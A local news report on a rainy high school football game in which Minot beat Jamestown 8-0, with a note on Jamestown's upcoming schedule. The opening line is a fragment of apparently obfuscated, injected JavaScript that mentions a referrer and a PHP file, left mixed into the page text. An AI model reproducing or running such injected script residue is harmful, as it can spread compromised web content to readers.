MINOT isnkt|var|u0026u|referrer|hefdh||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Their was only one touchdown scored on a blustery and rainy night in Minot that lead the No. 3 Magi to their seventh win of the season and put Jamestown on the brink of elimination from the playoffs. Ben Bolinske scored on a two-yard quarterback sneak in the first quarter to give Minot the games only tally.

The Magi were playing without kicker Ben Love so they went for two and Brady Lampert ran it in to make the score 8-0.

The weather was brutal again as it became the fourth straight game the Blue Jays played in the rain, but this time the weather played a major factor. The Jays had trouble holding onto the football in the passing game. QB Ross Monson was navigating the tough conditions but his receivers couldn’t catch it.

Jamestown had a late chance thanks to a wind-aided punt that was knocked down after about 10 yards. A few plays later, Ethan Gumke broke off the longest run of the day for Jamestown, but they wouldn’t be able to capitalize on the 1st-and-goal opportunity.

It was the last time Jamestown got the ball in the game as Minot turned to their tandem of Kolton Larsen and Lampert to run out the clock.

Jamestown is now 4-3 on the season and will play at Dickinson at 1pm on Saturday afternoon. The home finale is scheduled for October 25th against Fargo North.
